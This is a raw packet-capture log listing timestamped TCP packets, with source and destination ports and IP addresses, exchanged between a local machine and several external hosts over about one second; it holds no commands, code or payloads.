Sep 3, 2024 17:13:18.996558905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.996646881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.996711016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.997323990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.997340918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.997350931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.997374058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.997426033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.997522116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.997533083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.997543097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.997555017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.997584105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.997584105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.997596979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.997659922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.997723103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.998379946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.998421907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.998440027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.998542070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.044414997 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:19.051518917 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:19.057704926 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:19.090965033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.090984106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091001034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091026068 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.091051102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.091051102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.091075897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091088057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091099024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091104984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091150045 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.091329098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091340065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091350079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091360092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091370106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.091372013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091383934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091396093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091407061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091420889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.091444016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.091463089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.091801882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091811895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091892004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.091892004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.091962099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091974020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091984987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.091996908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092010975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.092037916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.092086077 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.092135906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092147112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092158079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092170000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092180967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092195034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.092195988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092195034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.092221022 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.092246056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.092700958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092711926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092717886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092722893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092734098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092817068 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.092823029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.092991114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093002081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093008995 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093013048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093024969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093036890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093038082 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093064070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093064070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093147993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093161106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093172073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093183041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093193054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093199015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093208075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093215942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093244076 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093266964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093612909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093624115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093633890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093643904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093653917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093655109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093668938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093678951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093678951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093681097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093718052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093748093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093759060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093771935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093781948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093801975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093811989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093812943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093811989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093823910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093835115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093842030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093846083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093858004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093868971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093868971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093880892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093890905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093903065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093907118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093914986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093926907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093929052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093938112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093949080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.093950033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093960047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.093962908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094007969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.094007969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.094540119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094551086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094562054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094573021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094588995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094594002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.094594002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.094600916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094640970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.094640970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.094680071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094691992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094702005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094713926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094723940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094736099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094746113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094752073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094754934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.094754934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.094763041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.094806910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.094806910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.159085989 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:19.164202929 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164218903 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164228916 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164236069 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164253950 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164396048 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164403915 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164412022 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164426088 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164436102 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164443970 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164453030 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.164764881 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.165108919 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.165118933 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.165214062 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:19.176503897 CEST	80	49733	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:19.176650047 CEST	49733	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:19.189856052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.189927101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.189938068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190006018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190017939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190023899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190030098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190042019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190059900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190092087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190092087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190109968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190299034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190310955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190366983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190366983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190449953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190462112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190473080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190488100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190495014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190517902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190563917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190795898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190807104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190817118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190849066 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190876007 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.190947056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190963030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190974951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190984964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.190995932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191005945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191093922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191271067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191287994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191299915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191310883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191322088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191344023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191344023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191382885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191405058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191593885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191606045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191617966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191629887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191648960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191690922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191745996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191756964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191762924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191771984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191787958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191801071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191812038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191812992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191886902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191890001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191904068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191917896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.191937923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.191983938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.192229033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192241907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192251921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192269087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192292929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.192292929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.192322969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.192377090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192389011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192406893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192418098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192429066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192437887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.192437887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.192462921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192468882 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.192476034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192495108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192504883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192514896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192526102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192532063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.192538023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.192548037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.192565918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.192588091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195081949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195094109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195102930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195112944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195128918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195139885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195149899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195159912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195177078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195194960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195255995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195266962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195276022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195286036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195297003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195312023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195312023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195312023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195328951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195339918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195349932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195374012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195374012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195398092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195502996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195554018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195699930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195710897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195722103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195734024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195749044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195754051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195771933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195805073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195878029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195889950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195899010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195909977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.195940018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.195956945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196027040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196038961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196044922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196055889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196096897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196096897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196124077 CEST	49733	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:19.196187019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196248055 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196357012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196368933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196377993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196388960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196400881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196405888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196414948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196433067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196444988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196455956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196461916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196461916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196466923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196505070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:19.196505070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196518898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:19.196528912 CEST	80	49730	52.212.52.84	192.168.2.8
